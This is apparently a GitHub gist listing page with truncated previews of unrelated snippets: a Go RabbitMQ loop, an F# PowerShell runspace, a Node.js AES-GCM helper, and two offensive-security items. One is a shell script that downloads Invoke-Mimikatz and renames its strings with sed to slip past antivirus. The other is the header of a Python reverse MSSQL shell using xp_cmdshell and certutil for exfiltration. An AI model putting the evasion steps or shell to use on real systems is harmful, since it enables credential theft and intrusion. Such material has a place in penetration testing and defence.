This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| go func() { | |
| for { | |
| err = rmq.Stream(cancelCtx) | |
| if errors.Is(err, rabbitmq.ErrDisconnected) { | |
| continue | |
| } | |
| break | |
| } | |
| }() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| import threading | |
| import HTMLParser | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| ''' | |
| Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
| Author: @xassiz | |
| ''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
| open System.Management.Automation | |
| open System.Management.Automation.Runspaces | |
| open System | |
| let runSpace = RunspaceFactory.CreateRunspace() | |
| runSpace.Open() | |
| let pipeline = runSpace.CreatePipeline() |
PaulSec
/ invoke_evasion.sh
Created
August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # AV Bypass to run Mimikatz | |
| # From: https://www.blackhillsinfosec.com/?p=5555 | |
| # Server side: | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
| sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
AndiDittrich
/ AesUtil.js
Last active
January 7, 2024 03:47
Node.js - AES Encryption/Decryption with AES-256-GCM using random Initialization Vector + Salt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MPL-2.0 | |
| // AES Encryption/Decryption with AES-256-GCM using random Initialization Vector + Salt | |
| // ---------------------------------------------------------------------------------------- | |
| // the encrypted datablock is base64 encoded for easy data exchange. | |
| // if you have the option to store data binary save consider to remove the encoding to reduce storage size | |
| // ---------------------------------------------------------------------------------------- | |
| // format of encrypted data - used by this example. not an official format | |
| // | |
| // +--------------------+-----------------------+----------------+----------------+ |